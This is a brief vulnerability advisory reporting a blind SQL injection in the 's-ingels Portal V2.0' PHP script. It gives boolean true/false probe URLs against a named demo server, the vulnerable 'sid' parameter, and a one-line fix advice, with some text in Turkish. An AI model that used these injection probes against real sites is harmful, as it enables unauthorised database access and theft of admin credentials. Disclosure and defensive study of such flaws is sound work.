<------------------- header data start ------------------- >

#############################################################

# author : Fl0riX Bug Researchers

# Script Name : s-ingels Portal V2.0

# Price : 17,18EUR

# Bug Type : SQL Injection (blind)

# Infection : Admin giris bilgileri alinabilir.

# Demo Vuln. :

TRUE(+)
» http://www.media-products-demoserver.de/ph113/index.php?action=picvote&sid=1 and 1=1
FALSE(-)
» http://www.media-products-demoserver.de/ph113/index.php?action=picvote&sid=1 and 1=0

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

/index.php?action=picvote&sid=[Blind SqL Inj.]

< -- bug code end of -- >